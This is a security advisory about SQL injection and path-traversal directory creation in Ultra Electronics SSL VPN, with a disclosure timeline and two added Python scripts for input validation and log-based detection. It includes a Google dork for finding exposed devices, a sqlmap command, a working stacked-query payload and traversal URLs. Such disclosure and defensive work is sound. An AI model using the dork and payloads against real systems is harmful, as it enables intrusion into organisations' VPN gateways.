Ultra Electronics SSL VPN 7.2.0.19 / 7.4.0.7 SQL Injection / Directory Creation
Source: http://www.osisecurity.com.au  Author: Webster  Published: 2014-10-08
Ultra Electronics / AEP Networks - SSL VPN (Netilla / Series A / Ultra
Protect) Vulnerabilities
  
Release Date:
 02-Oct-2014
  
Software:
 Ultra Electronics - Series A
  
Versions tested:
 Version 7.2.0.19 and 7.4.0.7 have been confirmed as vulnerable. Other
versions untested.
  
Google Dork: inurl:/preauth/login.cgi
Page 1 of about 321 results (0.25 seconds)
  
URL:
  
https://[target]/preauth/login.cgi?realm=local
  
There are a few different issues with the 'realm' parameter.
  
1) SQL injection. You can use sqlmap for this.
  
./sqlmap.py -u "https://[target]/preauth/login.cgi?realm=abc" --level 5
  
sqlmap identified the following injection points with a total of 927
HTTP(s) requests:
---
Place: GET
Parameter: realm
    Type: boolean-based blind
    Title: PostgreSQL stacked conditional-error blind queries
    Payload: realm=-2661'); SELECT (CASE WHEN (9569=9569) THEN 9569
ELSE 1/(SELECT 0) END);--
---
  
web application technology: Apache
back-end DBMS operating system: Linux Red Hat
back-end DBMS: PostgreSQL
banner:    'PostgreSQL 8.3.4 on x86_64-redhat-linux-gnu, compiled by
GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)'
  
Funnily enough, a lot of the source code is commented with things like
"#FIXME add param validation", a reminder from the developer that the
code doesn't validate input, yet it somehow made it into production.
  
DB.pm line ~189 where realm is used in an SQL select:
  
sub set_message {
    my $self = shift;
    warn(__PACKAGE__, "::set_message() called\n") if $self->{'debug'};

    my ($key, $value) = @_; # FIXME add param validation

    my $realm_name = $self->{'realm'};
    my $c = $self->{'_dbh'};
    my $locale = $self->{'locale'};
    my $r = $c->exec("
                select * from set_realm_message('$realm_name', '$locale', '$key', '$value')
                ");
    if ($r->resultStatus ne PGRES_TUPLES_OK) {
        return;
    }
    my $retval = $r->fetchrow;
    return $retval;
}
  
2) The realm is also used in a Perl-based mkdir() (via mkpath()). This
lets you create arbitrary folders, and the resulting error messages
disclose filesystem paths and reveal whether a given file exists.
  
Manager.pm line ~43:
chown $uid, $gid, mkpath($path, 0);
  
File.pm line ~160:
    my $parent = File::Basename::dirname($path);
    unless (-d $parent or $path eq $parent) {
        push(@created, mkpath($parent, $verbose, $mode));
    }
    print "mkdir $path\n" if $verbose;
  
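Both issues above come from the same untrusted value reaching two sinks with no validation: the string-interpolated SQL in set_message() (issue 1) and the mkpath() call on a realm-derived path (issue 2). The Python script below is an added example, not the vendor's code and not part of the original advisory, showing the fixes a defender would expect at both sinks: an allowlist on the realm name, a lexical containment check before any directory is created, and a bound-parameter query in place of string interpolation. The allowlist pattern, the function names, and the in-memory sqlite3 table standing in for the product's PostgreSQL set_realm_message() function are assumptions; the cache base directory is the one shown in the advisory's error output.

```python
import posixpath
import re
import sqlite3

# Base directory taken from the advisory's error output. The realm-name format
# is an assumption (the page never states the vendor's rules): treat the
# allowlist as a hypothetical policy to adapt to the real naming scheme.
CACHE_BASE = "/tmp/netilla-cache/C11N_get_messages"
REALM_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def validate_realm(realm: str) -> bool:
    """Allowlist the realm before it reaches SQL or the filesystem.

    Quotes, ';', '/', '.' and whitespace are all rejected, so neither the
    stacked-query payload nor '../../../etc/hosts' gets past this point.
    """
    return REALM_RE.fullmatch(realm) is not None


def contained_path(base: str, untrusted: str):
    """Lexically join base/untrusted and return it only if it stays under base.

    Pure string handling (no filesystem access), so it can run before any
    mkdir. Returns None for traversal, for an absolute component (which
    posixpath.join would let replace base), and for base itself.
    """
    candidate = posixpath.normpath(posixpath.join(base, untrusted))
    if candidate == base or posixpath.commonpath([base, candidate]) != base:
        return None
    return candidate


def safe_cache_dir(realm: str, base: str = CACHE_BASE) -> str:
    """What the advisory's mkpath() call site should do: validate, then contain."""
    if not validate_realm(realm):
        raise ValueError(f"rejected realm {realm!r}")
    path = contained_path(base, realm)
    if path is None:  # unreachable with the allowlist above; kept as defense in depth
        raise ValueError(f"realm escapes {base}")
    return path


def open_store() -> sqlite3.Connection:
    """In-memory stand-in (assumption) for the product's set_realm_message() function."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE realm_messages (realm TEXT, locale TEXT, key TEXT, value TEXT,"
        " PRIMARY KEY (realm, locale, key))"
    )
    return conn


def set_realm_message(conn, realm, locale, key, value):
    """Hardened counterpart of DB.pm's set_message(): allowlist the realm,
    then bind every parameter instead of interpolating it into the SQL text."""
    if not validate_realm(realm):
        raise ValueError(f"rejected realm {realm!r}")
    conn.execute(
        "INSERT OR REPLACE INTO realm_messages (realm, locale, key, value)"
        " VALUES (?, ?, ?, ?)",
        (realm, locale, key, value),
    )
    row = conn.execute(
        "SELECT value FROM realm_messages WHERE realm = ? AND locale = ? AND key = ?",
        (realm, locale, key),
    ).fetchone()
    return row[0]


if __name__ == "__main__":
    # The stacked-query payload from the sqlmap output above, passed as data:
    payload = "-2661'); SELECT (CASE WHEN (9569=9569) THEN 9569 ELSE 1/(SELECT 0) END);--"
    conn = open_store()
    print(set_realm_message(conn, "local", "en", "banner", payload))  # stored verbatim
    for realm in ("local", "../../../etc/hosts", "../../../../bin/"):
        try:
            print(realm, "->", safe_cache_dir(realm))
        except ValueError as exc:
            print(realm, "->", exc)
```

The containment check is deliberately separate from the allowlist: the allowlist is the fix, the containment check is what still protects the filesystem if someone later loosens the pattern to admit '.' or '/'.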
Examples:
  
https://[target]/preauth/login.cgi?realm=../../../etc/hosts
  
Error
mkdir /tmp/netilla-cache/C11N_get_messages/../../../etc/hosts: File
exists at /usr/lib/perl5/site_perl/5.8.8/Netilla/CONDA/Cache/Manager.pm
line 43
Back
  
https://[target]/preauth/login.cgi?realm=../../../../bin/
  
Error
mkdir /tmp/netilla-cache/C11N_get_messages/../../../../bin: Permission
denied at /usr/lib/perl5/site_perl/5.8.8/Netilla/CONDA/Cache/Manager.pm
line 43
Back
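Because both issues ride on a single GET parameter, attempts are easy to spot in the web server's access log while a fix is pending. The script below is an added example (not from the advisory and not vendor guidance): it parses Apache combined-format lines, URL-decodes the realm parameter and flags traversal sequences and SQL metacharacters. The log lines are constructed for illustration and the indicator patterns are a starting point to tune against your own baseline.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format lines (illustration only, not from the advisory).
# Lines 2-4 carry the realm values discussed above, percent-encoded the way a
# browser or sqlmap would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [02/Oct/2014:10:01:12 +0000] "GET /preauth/login.cgi?realm=local HTTP/1.1" 200 2481 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Oct/2014:10:01:15 +0000] "GET /preauth/login.cgi?realm=..%2F..%2F..%2Fetc%2Fhosts HTTP/1.1" 500 512 "-" "Mozilla/5.0"
203.0.113.9 - - [02/Oct/2014:10:01:16 +0000] "GET /preauth/login.cgi?realm=-2661%27%29%3B%20SELECT%20%28CASE%20WHEN%20%289569%3D9569%29%20THEN%209569%20ELSE%201%2F%28SELECT%200%29%20END%29%3B-- HTTP/1.1" 200 2481 "-" "sqlmap/1.0-dev"
203.0.113.9 - - [02/Oct/2014:10:01:17 +0000] "GET /preauth/login.cgi?realm=..%2F..%2F..%2F..%2Fbin%2F HTTP/1.1" 500 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicator patterns (assumed; tune for your environment). They run on the
# decoded value, so both "../" and "..%2F" are caught.
INDICATORS = (
    ("path-traversal", re.compile(r"(^|/)\.\.(/|$)")),
    ("sql-metachar", re.compile(r"['\";]|--")),
)


def realm_from_target(target: str):
    """Return the decoded 'realm' value from a request target, or None if absent.

    The query is split by hand rather than with parse_qs so that a ';' inside
    the value is never treated as a pair separator (older Python versions do).
    """
    for pair in urlsplit(target).query.split("&"):
        name, _, value = pair.partition("=")
        if unquote_plus(name) == "realm":
            return unquote_plus(value)
    return None


def classify_realm(value: str) -> list:
    """Return the names of every indicator that matches the decoded realm."""
    return [name for name, pattern in INDICATORS if pattern.search(value)]


def scan_log(text: str) -> list:
    """Return one record per request whose realm trips at least one indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        realm = realm_from_target(m["target"])
        if realm is None:
            continue
        reasons = classify_realm(realm)
        if reasons:
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": m["status"],
                         "realm": realm, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ts']} {hit['ip']} status={hit['status']} "
              f"reasons={','.join(hit['reasons'])} realm={hit['realm']!r}")
```

A 500 response paired with a traversal realm is the signature of the mkdir error page shown above; a long run of requests from one source with quotes and comment markers in the realm, as in the third line, matches the 927-request sqlmap session described earlier.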
  
The portal requires authentication to access "protected" areas but
once you are authenticated, you can HTTP GET internal device
configuration files and other resources that an authenticated user
shouldn't be able to read.
  
Credit:
 This vulnerability was discovered by Patrick Webster.
  
Disclosure timeline:
 28-May-2012 - Discovered during test.
 28-May-2012 - Vendor contact, referred to support and legal departments.
 19-Jun-2012 - Requested vendor update.
 20-Jun-2012 - Told to contact support email. Sent.
 19-Jul-2012 - Support request to close ticket. Told support no
progress has been made. Support requires CVE to progress.
 23-Jul-2012 - Told support no CVE has been assigned. Support refuse
to investigate without a CVE. Told to upgrade to newest release
7.4.0.7. Confirmed as affected.
 14-Aug-2012 - Vendor support closing ticket, no investigation or patch.
 02-Oct-2014 - Public disclosure. Assumed vulnerable.
  
 Note: Product is now known as NetillaOS by Northbridge Secure
Systems. 2014 status unknown.
